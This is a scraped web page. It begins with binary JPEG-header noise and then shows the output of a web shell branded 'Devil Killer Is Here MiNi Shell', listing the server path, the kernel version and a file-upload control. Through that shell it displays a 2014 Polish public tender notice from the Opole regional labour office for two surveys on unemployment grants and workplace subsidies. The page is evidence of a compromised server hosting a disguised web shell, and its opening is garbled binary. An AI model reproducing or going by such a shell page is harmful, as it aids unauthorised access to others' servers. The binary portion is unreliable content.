JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140710/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140710/150231-N-2014.html

<p class="kh_header"><b>Opole: Realizacja dwóch badań społecznych w ramach projektu Opolskie Obserwatorium Rynku Pracy III realizowanego przez Wojewódzki Urząd Pracy w Opolu</b><br>
<b>Numer ogłoszenia: 150231 - 2014; data zamieszczenia: 10.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy w Opolu , ul. Głogowska 25C, 45-315 Opole, woj. opolskie, tel. 0-77 4416701, faks 0-77 4416702.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja dwóch badań społecznych w ramach projektu Opolskie Obserwatorium Rynku Pracy III realizowanego przez Wojewódzki Urząd Pracy w Opolu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest przeprowadzenie dwóch badań z zakresu aktywnej polityki rynku pracy realizowanej w województwie opolskim. Badania obejmują instrumenty jakimi są dotacje na podjęcie działalności gospodarczej dla osób bezrobotnych oraz refundacje kosztów wyposażenia lub doposażenia stanowiska pracy dla skierowanych do zatrudnienia bezrobotnych, dla których podstawą prawną są następujące dokumenty: 1) Rozporządzenie Ministra Pracy i Polityki Społecznej z dnia 17 kwietnia 2009 roku w sprawie dokonywania refundacji kosztów wyposażenia lub doposażenia stanowiska pracy dla skierowanego bezrobotnego oraz przyznawania bezrobotnemu środków na podjęcie działalności gospodarczej (Dziennik Ustaw nr 62, poz. 512 z dnia 17 kwietnia 2009 roku). 2) Dokumentacja projektu PO KLucz do biznesu! oraz PO KLucz do biznesu 2! realizowanego w działaniu 6.2 Programu Operacyjnego Kapitał Ludzki. 2. Zamawiający zastrzega sobie prawo uczestnictwa w konceptualizacji i operacjonalizacji w trakcie przygotowania obu badań, a także formułowania wytycznych w aspekcie analizy uzyskanego materiału empirycznego oraz ostatecznego kształtu sporządzonych raportów. BADANIE I - Badanie skuteczności dotacji na podjęcie działalności gospodarczej w województwie opolskim. BADANIE II - Badanie skuteczności refundacji na tworzenie nowych miejsc pracy w województwie opolskim. 3. Celem Badania I jest ocena efektywności instrumentu stosowanego w latach 2009-2013 w województwie opolskim poprzez ustalenie: 1) Odsetek firm, które w chwili badania w dalszym ciągu prowadziły swoją działalność; 2) Bilansu zatrudnienia wśród firm istniejących na rynku; 3) Bilansu zatrudnienia względem firm, które zakończyły działalność tj. ustalenie ilu pracowników przyjęły firmy wobec liczby firm, które zostały zlikwidowane; 4) Prognoz zatrudnienia wśród firm istniejących na rynku; 5) Czasu po jakim następuje zwrot kosztu uczestnictwa w programie; 6) Czynników, które wpływają na skalę efektywności. 4. Przed przystąpieniem do realizacji Badania I Wykonawca zobligowany jest do sporządzenia operatu (bazy danych), w skład którego wchodzić będą: 1) Osoby bezrobotne, którym udzielono wsparcia w ramach projektu systemowego PO KLucz do biznesu! i PO KLucz do biznesu 2!, realizowanego w Działaniu 6.2 PO KL w okresie od 01.01.2009 roku do 30.06.2013 roku; 2) Osoby bezrobotne, którym udzielono wsparcia w ramach projektów systemowych realizowanych przez wszystkie powiatowe urzędy pracy województwa opolskiego w Poddziałaniu 6.1.3 PO KL w okresie od 01.01.2009 roku do 30.06.2013 roku; 3) soby bezrobotne, którym udzielono wsparcia w ramach środków Funduszu Pracy będących w dyspozycji wszystkich powiatowych urzędów pracy województwa opolskiego w okresie od 01.01.2009 roku do 30.06.2013 roku
5. Założenia realizacji Badania I:1) Badanie ma mieć charakter ilościowy z zastosowaniem metody kwestionariuszowej. Jako użyteczny kwestionariusz badania Zamawiający uzna kwestionariusz, w którym odsetek braku odpowiedzi na zadane pytania badawcze (zmienne) nie będzie większy niż 5%. 2) Wykonawca zobligowany jest do konsultowania z Zamawiającym konceptualizacji badania, do momentu jego akceptacji. 3) W trakcie realizacji badania Wykonawca posłuży się opracowanym przez siebie kwestionariuszem ankiety, zaakceptowanym przez Zamawiającego przed rozpoczęciem procesu zbierania danych. 4) Dobór prób badawczych: a) W przypadku  beneficjentów wskazanych w punkcie 4 podpunkt 1)dobór próby należy przeprowadzić w sposób losowo-warstwowy przy uwzględnieniu płci (pierwsza warstwa), wieku (druga warstwa), wykształcenia (trzecia warstwa) oraz powiatu, w którym beneficjent zamieszkiwał w dniu złożenia wniosku o udzielenie dotacji (czwarta warstwa) odrębnie dla każdego cyklu projektu PO KLucz do biznesu i PO KLucz do biznesu 2!. Wielkość efektywnie zrealizowanej próby musi umożliwiać uogólnienie wyników w stosunku do ogółu osób którym udzielono dotacji przy maksymalnej  wartość błędu +/-5%, i przedziale ufności 95% i nie może być mniejsza niż 77 osób dla projektu PO KLucz do biznesu oraz 290 dla projektu PO KLucz do biznesu 2!, b) W przypadku beneficjentów wskazanych w punkcie 4 podpunkt 2) i 3) próbę należy dobrać w sposób losowo-warstwowy przy uwzględnieniu płci (pierwsza warstwa), wieku (druga warstwa), wykształcenia (trzecia warstwa) oraz roku, w którym stosowano instrument (czwarta warstwa) odrębnie dla każdego powiatowego urzędu pracy w województwie opolskim. Wielkość efektywnie zrealizowanej próby badawczej musi umożliwiać uogólnienie wyników w stosunku do każdego powiatowego urzędu pracy przy  maksymalnej  wartość błędu +/-5%, i przedziale ufności 95% i nie może być mniejsza niż: -286 osób dla PUP w Brzegu,-151 osób dla PUP w Głubczycach,-212 osób dla PUP w Kędzierzynie-Koźlu,-185 osób dla PUP w Kluczborku,-157 osób dla PUP w Krapkowicach,-153 osoby dla PUP w Namysłowie,-259 osób dla PUP w Nysie,-209 osób dla PUP w Oleśnie,-290 osób dla PUP w Opolu,-147 osób dla PUP w Prudniku,
-155 osób dla PUP w Strzelcach Opolskich. 5) Respondenci: a) Wykonawca jest zobowiązany do informowania respondentów o tym, iż uczestniczą w badaniu realizowanym w ramach Programu Operacyjnego Kapitał Ludzki, a tym samym współfinansowanym przez Unię Europejską ze środków Europejskiego Funduszu Społecznego. b) Zamawiający dopuszcza swoją pomoc przy utworzeniu operatu jedynie w zakresie beneficjentów wskazanych w punkcie 4 podpunkt 1).
c) Zamawiający nie dopuszcza jakiejkolwiek pomocy ze swojej strony w dotarciu do respondentów. d) Spośród dostępnych technik dotarcia do respondentów Zamawiający dopuszcza stosowanie jednej lub kilku wybranych technik spośród następujących: wywiad bezpośredni (PAPI), wywiad telefoniczny (CATI), wywiad za pośrednictwem Internetu (CAWI). 6) Bazy danych: a) Przed przystąpieniem do badania Wykonawca prześle Zamawiającemu operat losowania prób badawczych, z pominięciem danych osobowych. Po jego zaakceptowaniu, Wykonawca będzie mógł przystąpić do losowania prób badawczych. Baza danych będzie zapisana w formacie obsługiwanym przez MS Excel i będzie zawierać informację o jego źródle zgodnie z punktem 4. b) Przed przystąpieniem do badania Wykonawca prześle zamawiającemu bazę danych zawierającą wylosowaną próbę badawczą, z pominięciem danych osobowych. Baza danych będzie zapisana w formacie obsługiwanym przez MS Excel i będzie zawierać informację o źródle operatu zgodnie z punktem 5 SIWZ. Po uzyskaniu akceptacji Wykonawca może przystąpić do zbierania danych od respondentów. c) Po zakończeniu badania Wykonawca prześle Zamawiającemu bazę danych z zakodowanymi odpowiedziami od respondentów w formacie obsługiwanym przez IBM SPSS Statistics 21. Informacje zebrane w trakcie procesu gromadzenia danych należy zakodować zgodnie z treścią pytań i kafeteriami odpowiedzi zamieszczonymi w narzędziu badawczym. W bazie danych znajdować się musi informacja o typie wsparcia, które zostało udzielone respondentowi, zgodnie z punktem 4. d) Na wyraźne polecenie Zamawiającego, Wykonawca niezwłocznie przekaże każdemu powiatowemu urzędowi pracy w województwie opolskim zrealizowaną i właściwą dla niego próbę  badawczą zawierającą komplet danych osobowych wraz z datą realizacji badania z danym respondentem, celem ewentualnej kontroli rzetelności zrealizowanej usługi. 7) Wytyczne z zakresu analizy a) Analiza i interpretacja danych w stosunku do wszystkich problemów badawczych musi odnosić się do specyfiki zasad regulujących stosowanie instrumentów, o których mowa w punkcie 1. b) Analiza i interpretacja danych pozyskanych w trakcie realizacji badania, o ile jest to zasadne powinna być realizowana z uwzględnieniem płci i wieku respondentów każdorazowo w odniesieniu do problemów badawczych. 8) Raport i materiały informacyjne a) Po zakończeniu zbierania danych od respondentów Wykonawca przedłoży Zamawiającemu raport o objętości maksimum 100 stron formatu A4 napisanego czcionką Times New Roman z interlinią 1,5, wydrukowany i trwale spięty w dwóch kopiach i nagrany na CD w formacie MS Word i Adobe Acrobat Reader wcześniej zaakceptowany przez Zamawiającego. Niedopuszczalne jest blokowanie plików hasłem lub innymi blokadami uniemożliwiającymi ich modyfikację i wydruk. b) Raport z badania ma składać się z następujących części:-Wniosków i rekomendacji płynących z badania,-Wstępu zawierającego skrócony opis badania,
-Opisu metodologii badania,-Rozdziałów merytorycznych zawierających analizy i interpretacje adekwatnie do poruszanych problemów badawczych c) Po akceptacji złożonego raportu, Wykonawca dostarczy Zamawiającemu projekt skrótu z badania dalej zwanym folderem (o objętości maksymalnie 16 stron z okładkami, w formacie A5) w formacie pdf. spełniającym wymogi druku w drukarni. Skład graficzny folderu podlega konsultacjom z Zamawiającym do momentu akceptacji, a jego koszt musi zostać wliczony w ogólny koszt realizacji usługi badawczej. d) Do zaakceptowanego przez Zamawiającego raportu, Wykonawca dostarczy recenzję raportu opracowaną przez osobę wskazaną przez Wykonawcę w złożonej przez niego ofercie, posiadającą co najmniej tytuł naukowy doktora habilitowanego nauk społecznych. 6. Celem realizacji Badania II jest analiza instrumentu stosowanego w latach 2009-2012 poprzez: 1) Ustalenie liczby firm, którym udzielono wsparcia.
2) Ustalenie efektywności zatrudnieniowej i kosztowej stosowanego instrumentu;
3) Określenie stopnia zadowolenia przedsiębiorców z udzielonego im wsparcia;
4) Określenie sytuacji bezrobotnych, którzy podjęli zatrudnienie w wyniku udzielenia przedsiębiorcom wsparcia; 5) Określenie stopnia zadowolenia bezrobotnych z udzielonego im wsparcia; 6) Ustalenie czynników, które wpływają na skalę efektywności kosztowej i zatrudnieniowej oraz stopień zadowolenia przedsiębiorców i bezrobotnych z udzielonego im wsparcia. 8. Przed przystąpieniem do realizacji Badania II Wykonawca zobligowany jest do sporządzenia dwóch operatów (baz danych), w skład których wchodzą: 1) Przedsiębiorstwa, którym udzielono wsparcia w ramach wyposażenia lub doposażenia stanowiska pracy dla skierowanego bezrobotnego; 2) Bezrobotni, którzy podjęli zatrudnienie w wyniku wsparcia przedsiębiorstw; 9. Założenia realizacji Badania II: 1) Badania wśród przedsiębiorstw oraz bezrobotnych mają mieć charakter ilościowy z zastosowaniem metody kwestionariuszowej. Jako użyteczny kwestionariusz badania Zamawiający uzna kwestionariusz, w którym odsetek braku odpowiedzi na zadane pytania badawcze (zmienne) nie będzie większy niż 5%. 2) Wykonawca zobligowany jest do konsultowania z Zamawiającym konceptualizacji badania, do momentu jego akceptacji. 3) W trakcie realizacji badania Wykonawca posłuży się opracowanymi przez siebie kwestionariuszami ankiet, zaakceptowanymi przez Zamawiającego przed rozpoczęciem procesu zbierania danych. 4) Dobór prób badawczych:
a) W przypadku przedsiębiorstw dobór próby należy przeprowadzić w sposób losowo-warstwowy przy uwzględnieniu sekcji PKD prowadzonej działalności (warstwa pierwsza), sektora prowadzonej działalności (warstwa druga), wielkości zatrudnienia w przedsiębiorstwie (warstwa trzecia) oraz roku, w którym stosowano instrument (czwarta warstwa) odrębnie dla każdego powiatowego urzędu pracy w województwie opolskim. Wielkość efektywnie zrealizowanej próby badawczej musi umożliwiać uogólnienie wyników w stosunku do każdego powiatowego urzędu pracy przy maksymalnej  wartość błędu +/-5%, i przedziale ufności 95%. Dokładna liczba respondentów zostanie dookreślona po przedstawieniu Zamawiającemu przez Wykonawcę operatu badania. b) W przypadku bezrobotnych dobór próby należy przeprowadzić w sposób losowo-warstwowy przy uwzględnieniu płci (warstwa pierwsza), wieku (warstwa druga), wykształcenia (warstwa trzecia) oraz roku, w którym stosowano instrument (warstwa czwarta) odrębnie dla każdego powiatowego urzędu pracy w województwie opolskim. Wielkość efektywnie zrealizowanej próby badawczej musi umożliwiać uogólnienie wyników w stosunku do każdego powiatowego urzędu pracy przy  maksymalnej  wartość błędu +/-5%, i przedziale ufności 95% i nie może być mniejsza niż:-273 osoby dla PUP w Brzegu,
-155 osób dla PUP w Głubczycach,-207 osób dla PUP w Kędzierzynie-Koźlu,-175 osoby dla PUP w Kluczborku,-111 osób dla PUP w Krapkowicach,-110 osób dla PUP w Namysłowie,-307 osoby dla PUP w Nysie,-153 osoby dla PUP w Oleśnie,-243 osoby dla PUP w Opolu,-100 osób dla PUP w Prudniku,-128 osób dla PUP w Strzelcach Opolskich. 5) Respondenci: a) Wykonawca jest zobowiązany do informowania respondentów o tym, iż uczestniczą w badaniu realizowanym w ramach Programu Operacyjnego Kapitał Ludzki, a tym samym współfinansowanym przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.b Zamawiający nie dopuszcza swojej pomocy przy utworzeniu operatów badania.
c) Zamawiający nie dopuszcza jakiejkolwiek pomocy ze swojej strony w dotarciu do respondentów. d) Spośród dostępnych technik dotarcia do respondentów Zamawiający dopuszcza stosowanie jednej lub kilku wybranych technik spośród następujących: wywiad bezpośredni (PAPI), wywiad telefoniczny (CATI), wywiad za pośrednictwem Internetu (CAWI). 6) Bazy danych: a) Przed przystąpieniem do badania Wykonawca prześle Zamawiającemu operaty losowania prób badawczych, z pominięciem danych osobowych. Po ich zaakceptowaniu Wykonawca będzie mógł przystąpić do losowania prób badawczych. Baza danych będzie zapisana w formacie obsługiwanym przez MS Excel. Po uzyskaniu akceptacji Wykonawca może przystąpić do zbierania danych od respondentów. b) Przed przystąpieniem do badania Wykonawca prześle zamawiającemu bazę danych zawierającą wylosowaną próbę badawczą, z pominięciem danych osobowych. Baza danych będzie zapisana w formacie obsługiwanym przez MS Excel. c) Po zakończeniu badania Wykonawca prześle Zamawiającemu bazę danych z zakodowanymi odpowiedziami od respondentów przedsiębiorców i bezrobotnych) w formacie obsługiwanym przez IBM SPSS Statistics 21. Informacje zebrane w trakcie procesu gromadzenia danych należy zakodować zgodnie z treścią pytań i kafeteriami odpowiedzi zamieszczonymi w narzędziu badawczym. d) Na wyraźne polecenie Zamawiającego, Wykonawca niezwłocznie przekaże każdemu powiatowemu urzędowi pracy w województwie opolskim zrealizowane i właściwe dla niego próby badawcze zawierające komplet danych osobowych celem ewentualnej kontroli rzetelności zrealizowanej usługi wraz z datą realizacji badania z danym respondentem. 7) Wytyczne z zakresu analizy
a) Analiza i interpretacja danych w stosunku do wszystkich problemów badawczych musi odnosić się do specyfiki zasad regulujących stosowanie instrumentów, o których mowa w punkcie 1. b) Analiza i interpretacja danych pozyskanych w trakcie realizacji badania, o ile jest to zasadne powinna być realizowana z uwzględnieniem płci i wieku  respondentów każdorazowo w odniesieniu do problemów badawczych. 8) Raport i materiały informacyjne
a) Po zakończeniu zbierania danych od respondentów Wykonawca przedłoży Zamawiającemu raport o objętości maksimum 100 stron formatu A4 napisanego czcionką Times New Roman z interlinią 1,5, wydrukowanego i trwale spiętego w dwóch kopiach i nagrany na CD w formacie MS Word i Adobe Acrobat Reader wcześniej zaakceptowany przez Zamawiającego. Niedopuszczalne jest blokowanie plików hasłem lub innymi blokadami uniemożliwiającymi ich modyfikację i wydruk.
b) Raport z badania ma składać się z następujących części:-Wniosków i rekomendacji płynących z badania, -Wstępu zawierającego skrócony opis badania,
-Opisu metodologii badania,-Rozdziałów merytorycznych zawierających analizy i interpretacje adekwatnie do poruszanych problemów badawczych c) Po akceptacji złożonego raportu, Wykonawca dostarczy Zamawiającemu projekt skrótu z badania dalej zwanym folderem (o objętości maksymalnie 16 stron z okładkami, w formacie A5) w formacie pdf. spełniającym wymogi druku w drukarni. Skład graficzny folderu podlega konsultacjom z Zamawiającym do momentu akceptacji, a jego koszt musi zostać wliczony w ogólny koszt realizacji usługi badawczej. d) Do zaakceptowanego przez Zamawiającego raportu, Wykonawca dostarczy recenzję raportu opracowaną przez osobę wskazaną przez Wykonawcę w złożonej przez niego ofercie, posiadającą co najmniej tytuł naukowy doktora habilitowanego nauk społecznych lub ekonomicznych. 9. Wykonawca odpowiedzialny jest za obsługę techniczną zakresu prac objętych SIWZ. 10. Wykonawca zobowiązany jest do umieszczenia na raportach, ankietach i innych elementach logotypów dostarczonych przez Zamawiającego. 11. Zamawiający zastrzega sobie prawo do przeprowadzenia kontroli u wybranych respondentów i wglądu w zrealizowane kwestionariusze na każdym etapie realizacji zamówienia. 12. W przypadku prośby Zamawiającego Wykonawca oddeleguje co najmniej jednego członka zespołu realizującego usługę badawczą, posiadającego odpowiednią wiedzę merytoryczną i predyspozycje, w charakterze prelegenta na konferencję podsumowującą organizowaną przez Zamawiającego, która odbędzie się w Opolu w okresie I kwartału 2015 roku..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 73.11.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, gdy Wykonawca wykaże, że 
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował co najmniej dwie główne usługi badawcze, o wartości brutto nie mniejszej niż 70 000,00 złotych każda, wraz z załączeniem dowodów, czy usługi te zostały wykonane należycie. Pod pojęciem głównej usługi badawczej należy rozumieć usługę badawczą przeprowadzoną metodą ilościową na próbie liczącej co najmniej 2500 osób. Dowodami, o których mowa powyżej są poświadczenia lub oświadczenie wykonawcy, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia. W celu potwierdzenia spełnienia powyższego warunku Wykonawca jest zobowiązany załączyć do swojej oferty wykaz wykonanych głównych usług badawczych, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane należycie, sporządzonego według wzoru stanowiącego Załącznik nr 3 do SIWZ. Ocena spełniania tego warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie przedłozonych dokumentów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, gdy Wykonawca wykaże, że będzie dysponować co najmniej 1 (jedną) osobą, która posiada tytuł naukowy doktora habilitowanego nauk społecznych, i która będzie odpowiedzialna za sporządzenie recenzji raportów z Badania I i Badania II oraz co najmniej 2 (dwoma) członkami wchodzącymi w skład zespołu badawczego posiadającymi tytuł co najmniej magistra. W celu potwierdzenia spełnienia powyższego warunku Wykonawca jest zobowiązany załączyć do swojej oferty wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, 
w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, sporządzonego według wzoru stanowiącego Załącznik nr 4 do SIWZ. Ocena spełniania tego warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie przedłozonych dokumentów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełnienia tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

